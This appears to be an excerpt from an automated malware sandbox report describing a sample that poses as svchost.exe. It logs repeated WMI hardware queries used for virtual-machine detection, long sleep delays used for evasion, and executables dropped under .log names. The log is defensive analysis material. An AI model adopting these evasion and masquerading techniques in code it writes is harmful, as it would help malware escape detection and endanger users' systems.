Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\comref\svchost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\comref\svchost.exe	Memory allocated: D20000 memory reserve \| memory write watch			Jump to behavior
Source: C:\comref\svchost.exe	Memory allocated: 1A8A0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\comref\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 599469	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 598561	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597401	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 593625	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 593359	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 592766	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 592469	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 591984	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 591625	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 591125	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 590837	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 590500	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 589375	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 588969	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 588641	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 588219	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 587984	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 587766	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 587016	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 586625	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 586141	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 585560	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 584531	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 584045	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 583672	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 583141	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 582922	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 582438	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 581906	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 581563	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 581297	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 580813	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 580438	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 579844	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 579453	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 579078	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 578813	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 578266	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 578110	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577995	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577886	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577767	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577641	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577525	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577421	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577310	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577203	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577093	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 576984	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\comref\svchost.exe	Window / User API: threadDelayed 7901			Jump to behavior
Source: C:\comref\svchost.exe	Window / User API: threadDelayed 1484			Jump to behavior

Source: C:\comref\svchost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LMrHnriI.log	Jump to dropped file
Source: C:\comref\svchost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ThQetCXk.log	Jump to dropped file
Source: C:\comref\svchost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ApTjSBhc.log	Jump to dropped file
Source: C:\comref\svchost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eVuUdNSS.log	Jump to dropped file
Source: C:\comref\svchost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jIMTFKhG.log	Jump to dropped file

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23713

Source: C:\comref\svchost.exe TID: 1204	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -599469s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 3840	Thread sleep time: -32400000s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -598561s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -597401s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -594266s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -593953s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -593625s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -593359s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -592766s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -592469s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -591984s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -591625s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -591125s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -590837s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -590500s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -589375s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -588969s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -588641s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -588219s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -587984s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -587766s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -587016s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -586625s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -586141s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -585560s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -584531s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -584045s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -583672s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -583141s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -582922s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -582438s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -581906s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -581563s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -581297s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -580813s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -580438s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -579844s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -579453s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -579078s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -578813s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -578266s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -578110s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -577995s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -577886s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -577767s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -577641s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -577525s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -577421s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -577310s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -577203s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -577093s >= -30000s	Jump to behavior
Source: C:\comref\svchost.exe TID: 1456	Thread sleep time: -576984s >= -30000s	Jump to behavior

Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\comref\svchost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\comref\svchost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\comref\svchost.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_002EA69B
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_002FC220
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_0030B348 FindFirstFileExA,	0_2_0030B348

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_002FE6A3 VirtualQuery,GetSystemInfo,

0_2_002FE6A3

Source: C:\comref\svchost.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 599875	Jump to behavior
